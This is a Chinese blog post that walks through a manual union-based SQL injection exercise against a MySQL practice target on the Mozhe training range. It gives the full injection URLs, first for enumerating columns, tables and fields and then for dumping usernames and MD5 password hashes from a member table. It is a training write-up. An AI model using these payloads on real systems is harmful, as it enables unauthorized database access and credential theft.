sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景:

自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

bash 复制代码
数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关推荐
草莓熊Lotso1 小时前
Git 分支管理:从基础操作到协作流程(本地篇)
大数据·服务器·开发语言·c++·人工智能·git·sql
@游子2 小时前
SQL注入语法和介绍(一)
数据库·oracle
上海云盾安全满满4 小时前
高防 IP 是如何帮助数藏行业防刷
网络·网络协议·tcp/ip
蒋士峰DBA修行之路4 小时前
实验十三 WDR诊断报告
数据库
q***33374 小时前
oracle 12c查看执行过的sql及当前正在执行的sql
java·sql·oracle
杂亿稿4 小时前
数据库的约束
数据库
u***32434 小时前
使用python进行PostgreSQL 数据库连接
数据库·python·postgresql
Codingwiz_Joy5 小时前
Day44 盲注、报错注入 & 实战复现
数据库·安全性测试
智慧医院运行管理解决方案专家6 小时前
医院安全管理优化首选:中科医信安全生产双重预防管理系统
安全·医院管理·医院智慧安全管理·平安医院·智慧医院后勤
7***99876 小时前
GaussDB数据库中SQL诊断解析之配置SQL限流
数据库·sql·gaussdb